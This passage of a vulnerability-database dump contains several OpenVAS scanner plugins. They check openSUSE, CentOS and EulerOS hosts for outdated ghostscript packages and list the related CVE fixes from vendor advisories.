of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814565\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\",\n \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\",\n \"CVE-2018-19476\", \"CVE-2018-19477\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:40:34 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4138-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4138-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00037.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ghostscript'\n package(s) announced via the openSUSE-SU-2018:4138-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ghostscript to version 9.26 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1552=1\");\n\n script_tag(name:\"affected\", value:\"ghostscript on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-debuginfo\", rpm:\"ghostscript-debuginfo~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-debugsource\", rpm:\"ghostscript-debugsource~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini\", rpm:\"ghostscript-mini~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-debuginfo\", rpm:\"ghostscript-mini-debuginfo~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-debugsource\", rpm:\"ghostscript-mini-debugsource~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-devel\", rpm:\"ghostscript-mini-devel~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-x11-debuginfo\", rpm:\"ghostscript-x11-debuginfo~9.26~lp150.2.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre-debugsource\", rpm:\"libspectre-debugsource~0.2.8~lp150.2.6.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre-devel\", rpm:\"libspectre-devel~0.2.8~lp150.2.6.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre1\", rpm:\"libspectre1~0.2.8~lp150.2.6.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre1-debuginfo\", rpm:\"libspectre1-debuginfo~0.2.8~lp150.2.6.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T16:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "The remote host is missing an update for the ", "modified": "2020-04-02T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310852185", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852185", "type": "openvas", "title": "openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4138-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852185\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\",\n \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\", \"CVE-2018-19476\",\n \"CVE-2018-19477\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:40:34 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4138-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4138-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00037.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ghostscript'\n package(s) announced via the openSUSE-SU-2018:4138-1 advisory.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.814565\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ghostscript to version 9.26 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n This update was imported from the SUSE:SLE-15:Update update project.\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1552=1\");\n\n script_tag(name:\"affected\", value:\"ghostscript on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in OID:1.3.6.1.4.1.25623.1.0.814565\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-07T16:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "The remote host is missing an update for the ", "modified": "2020-04-02T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310852190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852190", "type": "openvas", "title": "openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4140-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852190\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\",\n \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\", \"CVE-2018-19476\",\n \"CVE-2018-19477\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:41:34 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4140-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4140-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00038.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ghostscript'\n package(s) announced via the openSUSE-SU-2018:4140-1 advisory.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.814566\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ghostscript to version 9.26\n fixes the following issues:\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1556=1\");\n\n script_tag(name:\"affected\", value:\"ghostscript on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in OID:1.3.6.1.4.1.25623.1.0.814566\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-19409"], "description": "The remote host is missing an update for the ", "modified": "2019-03-08T00:00:00", "published": "2018-12-19T00:00:00", "id": "OPENVAS:1361412562310882987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882987", "type": "openvas", "title": "CentOS Update for ghostscript CESA-2018:3834 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id$\n#\n# CentOS Update for ghostscript CESA-2018:3834 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882987\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2018-15911\", \"CVE-2018-16541\", \"CVE-2018-16802\",\n \"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\",\n \"CVE-2018-19134\", \"CVE-2018-19409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-19 10:08:29 +0100 (Wed, 19 Dec 2018)\");\n script_name(\"CentOS Update for ghostscript CESA-2018:3834 centos7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2018:3834\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-December/023134.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ghostscript'\n package(s) announced via the CESA-2018:3834 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Ghostscript suite contains utilities for rendering PostScript and PDF\ndocuments. Ghostscript translates PostScript code to common bitmap formats\nso that the code can be displayed or printed.\n\nSecurity Fix(es):\n\n * ghostscript: Incorrect free logic in pagedevice replacement (699664)\n(CVE-2018-16541)\n\n * ghostscript: Incorrect 'restoration of privilege' checking when running\nout of stack during exception handling (CVE-2018-16802)\n\n * ghostscript: User-writable error exception table (CVE-2018-17183)\n\n * ghostscript: Saved execution stacks can leak operator arrays (incomplete\nfix for CVE-2018-17183) (CVE-2018-17961)\n\n * ghostscript: Saved execution stacks can leak operator arrays\n(CVE-2018-18073)\n\n * ghostscript: 1Policy operator allows a sandbox protection bypass\n(CVE-2018-18284)\n\n * ghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\n * ghostscript: Improperly implemented security check in zsetdevice function\nin psi/zdevice.c (CVE-2018-19409)\n\n * ghostscript: Uninitialized memory access in the aesdecode operator\n(699665) (CVE-2018-15911)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank Tavis Ormandy (Google Project Zero) for\nreporting CVE-2018-16541.\n\nBug Fix(es):\n\n * It has been found that ghostscript-9.07-31.el7_6.1 introduced regression\nduring the handling of shading objects, causing a 'Dropping incorrect\nsmooth shading object' warning. With this update, the regression has been\nfixed and the described problem no longer occurs. (BZ#1657822)\");\n\n script_tag(name:\"affected\", value:\"ghostscript on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~9.07~31.el7_6.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-cups\", rpm:\"ghostscript-cups~9.07~31.el7_6.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~9.07~31.el7_6.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-doc\", rpm:\"ghostscript-doc~9.07~31.el7_6.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-gtk\", rpm:\"ghostscript-gtk~9.07~31.el7_6.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-16539", "CVE-2018-19409"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191004", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191004", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ghostscript (EulerOS-SA-2019-1004)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1004\");\n script_version(\"2020-01-23T11:26:55+0000\");\n script_cve_id(\"CVE-2018-15911\", \"CVE-2018-16539\", \"CVE-2018-16541\", \"CVE-2018-16802\", \"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\", \"CVE-2018-19134\", \"CVE-2018-19409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:26:55 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:26:55 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ghostscript (EulerOS-SA-2019-1004)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1004\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1004\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ghostscript' package(s) announced via the EulerOS-SA-2019-1004 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"ghostscript: Incorrect free logic in pagedevice replacement (699664) (CVE-2018-16541)\n\nghostscript: Incorrect 'restoration of privilege' checking when running out of stack during exception handling (CVE-2018-16802)\n\nghostscript: User-writable error exception table (CVE-2018-17183)\n\nghostscript: Saved execution stacks can leak operator arrays (incomplete fix for CVE-2018-17183) (CVE-2018-17961)\n\nghostscript: Saved execution stacks can leak operator arrays (CVE-2018-18073)\n\nghostscript: 1Policy operator allows a sandbox protection bypass (CVE-2018-18284)\n\nghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\nghostscript: Improperly implemented security check in zsetdevice function in psi/zdevice.c (CVE-2018-19409)\n\nghostscript: Uninitialized memory access in the aesdecode operator (699665) (CVE-2018-15911)\n\nghostscript: incorrect access checking in temp file handling to disclose contents of files (699658) (CVE-2018-16539)\");\n\n script_tag(name:\"affected\", value:\"'ghostscript' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~9.07~31.6.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-cups\", rpm:\"ghostscript-cups~9.07~31.6.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-16509", "CVE-2018-19409"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191384", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191384", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ghostscript (EulerOS-SA-2019-1384)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1384\");\n script_version(\"2020-01-23T11:41:08+0000\");\n script_cve_id(\"CVE-2018-15911\", \"CVE-2018-16541\", \"CVE-2018-16802\", \"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\", \"CVE-2018-19134\", \"CVE-2018-19409\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:41:08 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:41:08 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ghostscript (EulerOS-SA-2019-1384)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", 